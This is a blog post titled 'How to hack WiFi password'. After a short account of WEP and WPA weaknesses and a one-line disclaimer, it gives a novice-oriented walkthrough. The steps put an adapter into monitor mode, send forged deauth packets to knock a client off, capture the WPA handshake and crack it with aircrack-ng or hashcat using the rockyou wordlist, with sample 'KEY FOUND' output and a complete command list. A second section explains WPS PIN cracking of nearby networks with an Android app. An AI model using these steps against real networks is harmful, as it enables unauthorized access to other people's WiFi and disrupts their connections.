• Breaking News

    How to hack WiFi password

    Disclaimer:This blog is for educational purpose only, don't use this techniques for illegal activities or harass someone

    What is Wireless Network?

    wireless network is a network connected through wireless medium such as radio waves,infrared waves,light waves(LiFi)etc.
    Wireless Network

    Wireless Network Securities

    As a cyber security expert I can say that WiFi passwords are not good option to secure your network from strangers access
    WiFi network rely in the two security system


    WEP is the acronym for Wired Equivalent Privacy. It was developed for IEEE 802.11 WLAN standards. Its goal was to provide the privacy equivalent to that provided by wired networks. WEP works by encrypting the data been transmitted over the network to keep it safe from eavesdropping.

    WEP Weakness

    • The integrity of the packets is checked using Cyclic Redundancy Check (CRC32)
    CRC32 integrity check can be compromised by capturing at least two packets. The bits in the encrypted stream and the checksum can be modified by the attacker so that the packet is accepted by the authentication system. This leads to unauthorized access to the network.
    • WEP is based on passwords; this makes it vulnerable to dictionary attacks.
    • Weak Initial values combinations do not encrypt sufficiently.
    • Keys management is poorly implemented


    WPA is the acronym for Wi-Fi Protected Access. It is a security protocol developed by the Wi-Fi Alliance in response to the weaknesses found in WEP. It is used to encrypt data on 802.11 WLANs. It uses higher Initial Values 48 bits instead of the 24 bits that WEP uses.  It uses temporal keys to encrypt packets.

    WPA Weaknesses
    • It is vulnerable to denial of service attacks
    • The collision avoidance implementation can be broken
    • Pre-shares keys use passphrases.  Weak passphrases are vulnerable to dictionary attacks.

    How to Hack WiFi Passwords?

    Hacking WiFi password is easy task to a hacker 
    If you not have knowledge in hacking please follow the instructions carefully

    1. Hacking WiFi password Using Kali Linux(PC)
    2. Hacking WiFi password Using Android Phone

      1.Hacking WiFi password using Kali Linux(Expert)

      Cracking With Aircrack-ng

      Aircrack-ng can be used for very basic dictionary attacks running on your CPU. Before you run the attack you need a wordlist. I recommend using the infamous rockyou dictionary file:
      # download the 134MB rockyou dictionary file
      curl -L -o rockyou.txt https://github.com/brannondorsey/naive-hashcat/releases/download/data/rockyou.txt

      Note, that if the network password is not in the wordlist you will not get the 
      # -a2 specifies WPA2, -b is the BSSID, -w is the wordfile
      aircrack-ng -a2 -b 9C:5C:8E:C9:AB:C0 -w rockyou.txt hackme.cap
      If the password is cracked you will see a KEY FOUND! message in the terminal followed by the plain text version of the network password.

      Aircrack-ng 1.2 beta3
      [00:01:49] 111040 keys tested (1017.96 k/s)
      KEY FOUND! [ hacktheplanet ]
      Master Key : A1 90 16 62 6C B3 E2 DB BB D1 79 CB 75 D2 C7 89  
       59 4A C9 04 67 10 66 C5 97 83 7B C3 DA 6C 29 2E
      Transient Key : CB 5A F8 CE 62 B2 1B F7 6F 50 C0 25 62 E9 5D 71  
       2F 1A 26 34 DD 9F 61 F7 68 85 CC BC 0F 88 88 73  
       6F CB 3F CC 06 0C 06 08 ED DF EC 3C D3 42 5D 78  
       8D EC 0C EA D2 BC 8A E2 D7 D3 A2 7F 9F 1A D3 21
      EAPOL HMAC : 9F C6 51 57 D3 FA 99 11 9D 17 12 BA B6 DB 06 B4

      Deauth Attack

      A deauth attack sends forged deauthentication packets from your machine to a client connected to the network you are trying to crack. These packets include fake “sender” addresses that make them appear to the client as if they were sent from the access point themselves. Upon receipt of such packets, most clients disconnect from the network and immediately reconnect, providing you with a 4-way handshake if you are listening with airodump-ng.
      Use airodump-ng to monitor a specific access point (using -c channel --bssid MAC) until you see a client (STATION) connected. A connected client look something like this, where is 64:BC:0C:48:97:F7 the client MAC.
      CH 6 ][ Elapsed: 2 mins ][ 2017–07–23 19:15 ]  
      9C:5C:8E:C9:AB:C0 -19 75 1043 144 10 6 54e WPA2 CCMP PSK ASUS  
      BSSID STATION PWR Rate Lost Frames Probe  
      9C:5C:8E:C9:AB:C0 64:BC:0C:48:97:F7 -37 1e- 1e 4 6479 ASUS
      Now, leave airodump-ng running and open a new terminal. We will use the aireplay-ng command to send fake deauth packets to our victim client, forcing it to reconnect to the network and hopefully grabbing a handshake in the process.
      # -0 2 specifies we would like to send 2 deauth packets. Increase this number
      # if need be with the risk of noticably interrupting client network activity
      # -a is the MAC of the access point
      # -c is the MAC of the client
      aireplay-ng -0 2 -a 9C:5C:8E:C9:AB:C0 -c 64:BC:0C:48:97:F7 mon0
      You can optionally broadcast deauth packets to all connected clients with:
      # not all clients respect broadcast deauths though
      aireplay-ng -0 2 -a 9C:5C:8E:C9:AB:C0 mon0
      Once you’ve sent the deauth packets, head back over to your airodump-ngprocess, and with any luck you should now see something like this at the top right: [ WPA handshake: 9C:5C:8E:C9:AB:C0. Now that you’ve captured a handshake you should be ready to crack the network password.

      List of Commands

      Below is a list of all of the commands needed to crack a WPA/WPA2 network, in order, with minimal explanation.
      # put your network device into monitor mode
      airmon-ng start wlan0
      # listen for all nearby beacon frames to get target BSSID and channel
      airodump-ng mon0
      # start listening for the handshake
      airodump-ng -c 6 — bssid 9C:5C:8E:C9:AB:C0 -w capture/ mon0
      # optionally deauth a connected client to force a handshake
      aireplay-ng -0 2 -a 9C:5C:8E:C9:AB:C0 -c 64:BC:0C:48:97:F7 mon0
      ########## crack password with aircrack-ng… ########### 
      download 134MB rockyou.txt dictionary file if needed
      curl -L -o rockyou.txt https://github.com/brannondorsey/naive-hashcat/releases/download/data/rockyou.txt
      # crack w/ aircrack-ng
      aircrack-ng -a2 -b 9C:5C:8E:C9:AB:C0 -w rockyou.txt capture/-01.cap
      ########## or crack password with naive-hashcat ##########
      #  convert cap to hccapxcap2hc
      capx.bin capture/-01.cap capture/-01.hccapx
      # crack with naive-hashcat
      HASH_FILE=hackme.hccapx POT_FILE=hackme.pot HASH_TYPE=2500 ./naive-hashcat.sh

      2.Hacking WiFi Password Using Android Phone

      WiFi warden is an Android app which can be used to detect vulnerabilities of any WiFi adapter. In this post we will give a detailed tutorial on How to hack WiFi using wifi warden.
      WiFi Warden is mainly used to monitor a WiFi device and to check frequency, channel, modem manufacturer, encryption, security, distance to the router, power, name and Mac address of wireless access points around it. This app can be used on both non-rooted android device (Android 5 and later) and rooted device (android 4.4 and earlier).
      With WiFi Warden, you can secure your WiFi network, monitor it and check it for any vulnerabilities or flaws. Also, you can use it to find loopholes on any other WPS enabled WiFi adapter.
      Download WiFi Warden from Gogle Play store by clicking on this link.
      1: Download WiFi warden from play store and installon your Android device.
      2: On the network tab you can see all the available WiFi networks near you. Click on any one of them.
      How to hack WiFi password
      3: Select your desired network. You will get options to Connect, increase security and more.
      How to hack WiFi password
      4: If you want to use WiFi warden to increase you WiFi security, then use first step (Increase security).
      5: If you want to check vulnerabilities or crack a WiFi network, then use the “connect” option.
      6: Select ” Connect using WPS”. If you donot know the adapter pin, then use “Calculate pin” option.
      How to hack WiFi password
      7: You will see multiple Pins. Select one of them or try all to generate a pin.
      How to hack WiFi password
      8: If the WiFi adapter is vulnerable to attacks, then it can easily be cracked and pin number will be displayed. You can now use this pin to connect to that WiFi network.

      How to hack WiFi password

      How To Prevent WiFi Hacking on Your Modem?
      • limit WiFi range on your home or office
      • Use Mac Filter on your modem
      Leave your tips to prevent hacking WiFi....

      No comments

      Post Bottom Ad